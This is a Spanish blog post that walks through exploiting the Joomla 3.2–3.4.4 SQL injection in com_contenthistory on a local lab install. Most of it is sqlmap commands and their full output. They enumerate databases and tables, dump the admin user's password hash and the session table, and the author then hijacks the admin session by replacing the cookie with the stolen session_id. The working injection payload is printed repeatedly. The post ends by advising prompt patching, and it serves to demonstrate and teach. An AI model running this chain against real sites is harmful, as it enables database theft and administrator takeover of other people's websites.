25 Oct 2015
Sin categoría No Comments
25 octubre, 2015 Alberto

Joomla SQL Injection de la versión 3.2 a la 3.4.4

Joomla SQL Injection

Joomla es uno de los sistemas de gestión de contenidos más populares para la creación de páginas web. En estos momentos se estima que 2.8 millones de sitios web están construidos con este CMS. Normalmente las vulnerabilidades que se encuentran en estos sistemas afectan a extensiones de terceros, lo cual limita la superficie de ataque únicamente a aquellos sitios que hagan uso de ellas. Pero en algunas ocasiones, las vulnerabilidades también se encuentran en el núcleo del CMS, como en este caso, en el que ha quedado expuesto a un posible ataque que permite un acceso con permisos de administrador al 6,6% de todos los sitios web que utilizan sistemas de gestión de contenidos, la cuota de mercado actual de Joomla.

La vulnerabilidad publicada hace dos días y para la que ya ha salido parche se trata de una inyección de SQL identificada con los CVE CVE-2015-7297, CVE-2015-7857, y CVE-2015-7858 afectando desde la version 3.2 hasta la última versión actual 3.4.4. Esta se encuentra en una consulta SQL en el archivo /administrator/components/com_contenthistory/models/history.php.  En el blog de trustwave hacen una muy buena descripción técnica de cómo han ido atando cabos hasta dar con la vulnerabilidad.

Por mi parte he montado un pequeño laboratorio con un Joomla vulnerable, en este caso la versión 3.2, para comprobar cómo se puede explotar.

He probado la inyección directamente con sqlmap:


sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --technique=E --dbs

Obteniendo la inyección:


root@KaliVB:~# sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=" --threads=10 --dbms=MYSQL  --technique=E --dbs

_

___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:47:40

[19:47:40] [INFO] loading tamper script 'apostrophemask'

[19:47:40] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly

[19:47:40] [INFO] testing connection to the target URL

[19:47:40] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: list[select] (GET)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=' AND (SELECT 5490 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(5490=5490,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

---

[19:47:40] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[19:47:40] [INFO] testing MySQL

[19:47:40] [INFO] confirming MySQL

[19:47:40] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Debian

web application technology: Apache 2.4.10

back-end DBMS: MySQL >= 5.0.0

[19:47:40] [INFO] fetching database names

[19:47:40] [INFO] the SQL query used returns 4 entries

[19:47:40] [INFO] starting 4 threads

[19:47:40] [INFO] resumed: JoomlaLab

[19:47:40] [INFO] resumed: mysql

[19:47:40] [INFO] resumed: performance_schema

[19:47:40] [INFO] resumed: information_schema

available databases [4]:

[*] information_schema

[*] JoomlaLab

[*] mysql

[*] performance_schema

[19:47:40] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 3 times

[19:47:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'

[*] shutting down at 19:47:40

A continuación podemos enumerar las tablas de la base de datos:

root@KaliVB:~# sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D JoomlaLab --tables

_

___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:52:28

[19:52:28] [INFO] loading tamper script 'apostrophemask'

[19:52:28] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly

[19:52:28] [INFO] testing connection to the target URL

[19:52:28] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: list[select] (GET)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=' AND (SELECT 5490 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(5490=5490,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

---

[19:52:28] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[19:52:28] [INFO] testing MySQL

[19:52:28] [INFO] confirming MySQL

[19:52:28] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Debian

web application technology: Apache 2.4.10

back-end DBMS: MySQL >= 5.0.0

[19:52:28] [INFO] fetching tables for database: 'JoomlaLab'

[19:52:28] [WARNING] reflective value(s) found and filtering out

[19:52:28] [INFO] the SQL query used returns 68 entries

[19:52:28] [INFO] starting 10 threads

[19:52:29] [INFO] retrieved: q9741_banner_tracks

[19:52:29] [INFO] retrieved: q9741_assets

[19:52:29] [INFO] retrieved: q9741_categories

[19:52:29] [INFO] retrieved: q9741_banner_clients

[19:52:29] [INFO] retrieved: q9741_associations

[19:52:29] [INFO] retrieved: q9741_banners

[19:52:29] [INFO] retrieved: q9741_contact_details

[19:52:29] [INFO] retrieved: q9741_content_frontpage

[19:52:29] [INFO] retrieved: q9741_content

[19:52:29] [INFO] retrieved: q9741_content_rating

[19:52:29] [INFO] retrieved: q9741_content_types

[19:52:29] [INFO] retrieved: q9741_core_log_searches

[19:52:29] [INFO] retrieved: q9741_contentitem_tag_map

[19:52:29] [INFO] retrieved: q9741_finder_links

[19:52:29] [INFO] retrieved: q9741_extensions

[19:52:29] [INFO] retrieved: q9741_finder_links_terms1

[19:52:29] [INFO] retrieved: q9741_finder_links_terms0

[19:52:29] [INFO] retrieved: q9741_finder_links_terms2

[19:52:29] [INFO] retrieved: q9741_finder_filters

[19:52:29] [INFO] retrieved: q9741_finder_links_terms5

[19:52:29] [INFO] retrieved: q9741_finder_links_terms4

[19:52:29] [INFO] retrieved: q9741_finder_links_terms3

[19:52:29] [INFO] retrieved: q9741_finder_links_terms7

[19:52:29] [INFO] retrieved: q9741_finder_links_terms9

[19:52:29] [INFO] retrieved: q9741_finder_links_terms8

[19:52:29] [INFO] retrieved: q9741_finder_links_termsb

[19:52:29] [INFO] retrieved: q9741_finder_links_terms6

[19:52:29] [INFO] retrieved: q9741_finder_links_termsa

[19:52:29] [INFO] retrieved: q9741_finder_links_termsc

[19:52:30] [INFO] retrieved: q9741_finder_links_termse

[19:52:30] [INFO] retrieved: q9741_finder_links_termsd

[19:52:30] [INFO] retrieved: q9741_finder_terms

[19:52:30] [INFO] retrieved: q9741_finder_taxonomy

[19:52:30] [INFO] retrieved: q9741_finder_tokens

[19:52:30] [INFO] retrieved: q9741_finder_tokens_aggregate

[19:52:30] [INFO] retrieved: q9741_finder_taxonomy_map

[19:52:30] [INFO] retrieved: q9741_finder_links_termsf

[19:52:30] [INFO] retrieved: q9741_finder_terms_common

[19:52:30] [INFO] retrieved: q9741_modules_menu

[19:52:30] [INFO] retrieved: q9741_menu

[19:52:30] [INFO] retrieved: q9741_menu_types

[19:52:30] [INFO] retrieved: q9741_messages_cfg

[19:52:30] [INFO] retrieved: q9741_messages

[19:52:30] [INFO] retrieved: q9741_languages

[19:52:30] [INFO] retrieved: q9741_finder_types

[19:52:30] [INFO] retrieved: q9741_modules

[19:52:30] [INFO] retrieved: q9741_newsfeeds

[19:52:30] [INFO] retrieved: q9741_tags

[19:52:30] [INFO] retrieved: q9741_postinstall_messages

[19:52:30] [INFO] retrieved: q9741_overrider

[19:52:30] [INFO] retrieved: q9741_session

[19:52:30] [INFO] retrieved: q9741_redirect_links

[19:52:30] [INFO] retrieved: q9741_template_styles

[19:52:30] [INFO] retrieved: q9741_schemas

[19:52:30] [INFO] retrieved: q9741_ucm_base

[19:52:30] [INFO] retrieved: q9741_updates

[19:52:30] [INFO] retrieved: q9741_ucm_content

[19:52:30] [INFO] retrieved: q9741_update_sites_extensions

[19:52:30] [INFO] retrieved: q9741_user_notes

[19:52:30] [INFO] retrieved: q9741_update_sites

[19:52:30] [INFO] retrieved: q9741_ucm_history

[19:52:30] [INFO] retrieved: q9741_user_usergroup_map

[19:52:30] [INFO] retrieved: q9741_user_keys

[19:52:30] [INFO] retrieved: q9741_viewlevels

[19:52:30] [INFO] retrieved: q9741_usergroups

[19:52:30] [INFO] retrieved: q9741_user_profiles

[19:52:30] [INFO] retrieved: q9741_users

[19:52:30] [INFO] retrieved: q9741_weblinks

Database: JoomlaLab

[68 tables]

+-------------------------------+

| q9741_assets |

| q9741_associations |

| q9741_banner_clients |

| q9741_banner_tracks |

| q9741_banners |

| q9741_categories |

| q9741_contact_details |

| q9741_content |

| q9741_content_frontpage |

| q9741_content_rating |

| q9741_content_types |

| q9741_contentitem_tag_map |

| q9741_core_log_searches |

| q9741_extensions |

| q9741_finder_filters |

| q9741_finder_links |

| q9741_finder_links_terms0 |

| q9741_finder_links_terms1 |

| q9741_finder_links_terms2 |

| q9741_finder_links_terms3 |

| q9741_finder_links_terms4 |

| q9741_finder_links_terms5 |

| q9741_finder_links_terms6 |

| q9741_finder_links_terms7 |

| q9741_finder_links_terms8 |

| q9741_finder_links_terms9 |

| q9741_finder_links_termsa |

| q9741_finder_links_termsb |

| q9741_finder_links_termsc |

| q9741_finder_links_termsd |

| q9741_finder_links_termse |

| q9741_finder_links_termsf |

| q9741_finder_taxonomy |

| q9741_finder_taxonomy_map |

| q9741_finder_terms |

| q9741_finder_terms_common |

| q9741_finder_tokens |

| q9741_finder_tokens_aggregate |

| q9741_finder_types |

| q9741_languages |

| q9741_menu |

| q9741_menu_types |

| q9741_messages |

| q9741_messages_cfg |

| q9741_modules |

| q9741_modules_menu |

| q9741_newsfeeds |

| q9741_overrider |

| q9741_postinstall_messages |

| q9741_redirect_links |

| q9741_schemas |

| q9741_session |

| q9741_tags |

| q9741_template_styles |

| q9741_ucm_base |

| q9741_ucm_content |

| q9741_ucm_history |

| q9741_update_sites |

| q9741_update_sites_extensions |

| q9741_updates |

| q9741_user_keys |

| q9741_user_notes |

| q9741_user_profiles |

| q9741_user_usergroup_map |

| q9741_usergroups |

| q9741_users |

| q9741_viewlevels |

| q9741_weblinks |

+-------------------------------+

[19:52:30] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 72 times

[19:52:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'

[*] shutting down at 19:52:30

root@KaliVB:~#

A continuación se puede ir por el camino clásico y volcar la tabla de usuarios para crackear el hash de la contraseña:


root@KaliVB:~# sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --technique=E -D JoomlaLab -T q9741_users --dump

_

___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:00:11

[21:00:11] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly

[21:00:11] [INFO] testing connection to the target URL

[21:00:11] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: list[select] (GET)

Type: error-based

Title: MySQL >= 5.0 error-based - Parameter replace

Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=(SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(9327=9327,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

---

[21:00:11] [INFO] testing MySQL

[21:00:11] [INFO] confirming MySQL

[21:00:11] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Debian

web application technology: Apache 2.4.10

back-end DBMS: MySQL >= 5.0.0

[21:00:11] [INFO] fetching columns for table 'q9741_users' in database 'JoomlaLab'

[21:00:11] [WARNING] reflective value(s) found and filtering out

[21:00:11] [INFO] the SQL query used returns 15 entries

[21:00:11] [INFO] starting 10 threads

[21:00:11] [INFO] retrieved: id

[21:00:11] [INFO] retrieved: name

[21:00:11] [INFO] retrieved: registerDate

[21:00:11] [INFO] retrieved: password

[21:00:11] [INFO] retrieved: email

[21:00:11] [INFO] retrieved: block

[21:00:11] [INFO] retrieved: sendEmail

[21:00:11] [INFO] retrieved: username

[21:00:11] [INFO] retrieved: activation

[21:00:11] [INFO] retrieved: lastvisitDate

[21:00:11] [INFO] retrieved: varchar(100)

[21:00:11] [INFO] retrieved: varchar(255)

[21:00:11] [INFO] retrieved: tinyint(4)

[21:00:11] [INFO] retrieved: datetime

[21:00:11] [INFO] retrieved: varchar(100)

[21:00:11] [INFO] retrieved: tinyint(4)

[21:00:11] [INFO] retrieved: int(11)

[21:00:11] [INFO] retrieved: datetime

[21:00:11] [INFO] retrieved: varchar(150)

[21:00:11] [INFO] retrieved: varchar(100)

[21:00:11] [INFO] retrieved: params

[21:00:11] [INFO] retrieved: resetCount

[21:00:11] [INFO] retrieved: otep

[21:00:11] [INFO] retrieved: lastResetTime

[21:00:11] [INFO] retrieved: otpKey

[21:00:11] [INFO] retrieved: text

[21:00:12] [INFO] retrieved: varchar(1000)

[21:00:12] [INFO] retrieved: int(11)

[21:00:12] [INFO] retrieved: datetime

[21:00:12] [INFO] retrieved: varchar(1000)

[21:00:12] [INFO] fetching entries for table 'q9741_users' in database 'JoomlaLab'

[21:00:12] [INFO] the SQL query used returns 1 entries

[21:00:12] [INFO] retrieved: 0

[21:00:12] [INFO] retrieved: 0

[21:00:12] [INFO] retrieved: correo@gmail.com

[21:00:12] [INFO] retrieved: 601

[21:00:12] [INFO] retrieved: 0000-00-00 00:00:00

[21:00:12] [INFO] retrieved: 2015-10-24 16:16:32

[21:00:12] [INFO] retrieved: Super User

[21:00:12] [INFO] retrieved: 

[21:00:12] [INFO] retrieved: 

[21:00:12] [INFO] retrieved: 

[21:00:12] [INFO] retrieved: $2y$10$SD20rJFbG7QEXyfMaw9IC.yRigW2NwZ2RVZzbFlNJ1/cDTsC9DL2y

[21:00:12] [INFO] retrieved: 2015-10-24 16:11:53

[21:00:12] [INFO] retrieved: 0

[21:00:12] [INFO] retrieved: 1

[21:00:12] [INFO] retrieved: alberto

[21:00:12] [INFO] analyzing table dump for possible password hashes

Database: JoomlaLab

Table: q9741_users

[1 entry]

+-----+------------+---------+---------------------------------+-------+---------+---------+----------+--------------------------------------------------------------+-----------+------------+------------+---------------------+---------------------+---------------------+

| id | name | otep | email | block | otpKey | params | username | password | sendEmail | activation | resetCount | registerDate | lastResetTime | lastvisitDate |

+-----+------------+---------+---------------------------------+-------+---------+---------+----------+--------------------------------------------------------------+-----------+------------+------------+---------------------+---------------------+---------------------+

| 601 | Super User | <blank> | correo@gmail.com | 0 | <blank> | <blank> | alberto | $2y$10$SD20rJFbG7QEXyfMaw9IC.yRigW2NwZ2RVZzbFlNJ1/cDTsC9DL2y | 1 | 0 | 0 | 2015-10-24 16:11:53 | 0000-00-00 00:00:00 | 2015-10-24 16:16:32 |

+-----+------------+---------+---------------------------------+-------+---------+---------+----------+--------------------------------------------------------------+-----------+------------+------------+---------------------+---------------------+---------------------+

[21:00:12] [INFO] table 'JoomlaLab.q9741_users' dumped to CSV file '/root/.sqlmap/output/127.0.0.1/dump/JoomlaLab/q9741_users.csv'

[21:00:12] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 50 times

[21:00:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'

[*] shutting down at 21:00:12

Pero dandole una vuelta más, lo que hacen en Trustwave para saltarse el farragoso proceso de crackear la contraseña es consultar la tabla *_session y coger el token de autenticación del administrador para hacer un secuestro de sesión o hijacking.

 root@KaliVB:~# sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --technique=E -D JoomlaLab -T q9741_session --dump --stop 1 _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 21:20:15 [21:20:15] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [21:20:15] [INFO] testing connection to the target URL [21:20:15] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: list[select] (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=(SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(9327=9327,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) --- [21:20:15] [INFO] testing MySQL [21:20:15] [INFO] confirming MySQL [21:20:15] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.0 [21:20:15] [INFO] fetching columns for table 'q9741_session' in database 'JoomlaLab' [21:20:15] [INFO] the SQL query used returns 7 entries [21:20:15] [INFO] starting 7 threads [21:20:15] [INFO] resumed: session_id [21:20:15] [INFO] resumed: varchar(200) [21:20:15] [INFO] resumed: client_id [21:20:15] [INFO] resumed: tinyint(3) unsigned [21:20:15] [INFO] resumed: guest [21:20:15] [INFO] resumed: tinyint(4) unsigned [21:20:15] [INFO] resumed: time [21:20:15] [INFO] resumed: data [21:20:15] [INFO] resumed: varchar(14) [21:20:15] [INFO] resumed: mediumtext [21:20:15] [INFO] resumed: userid [21:20:15] [INFO] resumed: int(11) [21:20:15] [INFO] resumed: username [21:20:15] [INFO] resumed: varchar(150) [21:20:15] [INFO] fetching entries for table 'q9741_session' in database 'JoomlaLab' [21:20:15] [INFO] resumed: 1445712986 [21:20:15] [INFO] resumed: 0 [21:20:15] [INFO] resumed: __default|a:7:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1445712986;s:18:"session.timer.last";i:1445712986;s:17:"session.timer.now";i:1445712986;s:22:"session.client.browser";s:50:"sqlmap/1.0-dev-nongit-20151024 (http://sqlmap.org)";s:8:"registry";O:9:"JRegistry":1:{s:7:"\\\\0\\\\0\\\\0data";O:8:"stdClass":1:{s:18:"com_contenthistory";O:8:"stdClass":1:{s:7:"history";O:8:"stdClass":1:{s:4:"list";a:2:{s:8:"ordering";s:0:"";s:6:"select";s:0:"";}}}}}s:4:"user";O:5:"JUser":24:{s:9:"\\\\0\\\\0\\\\0isRoot";N;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password";N;s:14:"password_clear";s:0:"";s:5:"block";N;s:9:"sendEmail";i:0;s:12:"registerDate";N;s:13:"lastvisitDate";N;s:10:"activation";N;s:6:"params";N;s:6:"groups";a:1:{i:0;s:2:"13";}s:5:"guest";i:1;s:13:"lastResetTime";N;s:10:"resetCount";N;s:10:"\\\\0\\\\0\\\\0_params";O:9:"JRegistry":1:{s:7:"\\\\0\\\\0\\\\0data";O:8:"stdClass":0:{}}s:14:"\\\\0\\\\0\\\\0_authGroups";N;s:14:"\\\\0\\\\0\\\\0_authLevels";a:2:{i:0;i:1;i:1;i:1;}s:15:"\\\\0\\\\0\\\\0_authActions";N;s:12:"\\\\0\\\\0\\\\0_errorMsg";N;s:10:"\\\\0\\\\0\\\\0_errors";a:0:{}s:3:"aid";i:0;}} [21:20:15] [INFO] resumed: 1 [21:20:15] [INFO] resumed: 001sn75fhrcri90rvlrgdrpg35 [21:20:15] [INFO] resumed: 0 [21:20:15] [INFO] resumed: [21:20:15] [INFO] analyzing table dump for possible password hashes Database: JoomlaLab Table: q9741_session [1 entry] +--------+-----------+----------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+------------+----------+ | userid | client_id | session_id | data | guest | time | username | +--------+-----------+----------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+------------+----------+ | 0 | 0 | 001sn75fhrcri90rvlrgdrpg35 | __default|a:7:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1445712986;s:18:"session.timer.last";i:1445712986;s:17:"session.timer.now";i:1445712986;s:22:"session.client.browser";s:50:"sqlmap/1.0-dev-nongit-20151024 (http://sqlmap.org)";s:8:"registry";O:9:"JRegistry":1:{s:7:"\\0\\0\\0data";O:8:"stdClass":1:{s:18:"com_contenthistory";O:8:"stdClass":1:{s:7:"history";O:8:"stdClass":1:{s:4:"list";a:2:{s:8:"ordering";s:0:"";s:6:"select";s:0:"";}}}}}s:4:"user";O:5:"JUser":24:{s:9:"\\0\\0\\0isRoot";N;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password";N;s:14:"password_clear";s:0:"";s:5:"block";N;s:9:"sendEmail";i:0;s:12:"registerDate";N;s:13:"lastvisitDate";N;s:10:"activation";N;s:6:"params";N;s:6:"groups";a:1:{i:0;s:2:"13";}s:5:"guest";i:1;s:13:"lastResetTime";N;s:10:"resetCount";N;s:10:"\\0\\0\\0_params";O:9:"JRegistry":1:{s:7:"\\0\\0\\0data";O:8:"stdClass":0:{}}s:14:"\\0\\0\\0_authGroups";N;s:14:"\\0\\0\\0_authLevels";a:2:{i:0;i:1;i:1;i:1;}s:15:"\\0\\0\\0_authActions";N;s:12:"\\0\\0\\0_errorMsg";N;s:10:"\\0\\0\\0_errors";a:0:{}s:3:"aid";i:0;}} | 1 | 1445712986 | <blank> | +--------+-----------+----------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+------------+----------+ [21:20:15] [INFO] table 'JoomlaLab.q9741_session' dumped to CSV file '/root/.sqlmap/output/127.0.0.1/dump/JoomlaLab/q9741_session.csv' [21:20:15] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 2 times [21:20:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1' [*] shutting down at 21:20:15

root@KaliVB:~#

Una vez se obtiene el token sólo hay que refrescar el navegador.

Refrescar el navegador

Refrescar el navegador

Modificar la cookie con el valor de session_id

Manipular la cookie con el session id

Manipular la cookie con el session id

Y ya estamos dentro.

Secuestro de sesión

Secuestro de sesión

Queda visto lo sencillo que es explotar esta vulnerabilidad. La recomendación es actualizar cuánto antes a la última versión que solventa esta vulnerabilidad y esperara a Noviembre cuando se lanzará la versión 3.5 renovada.

 
, , ,

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

*

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies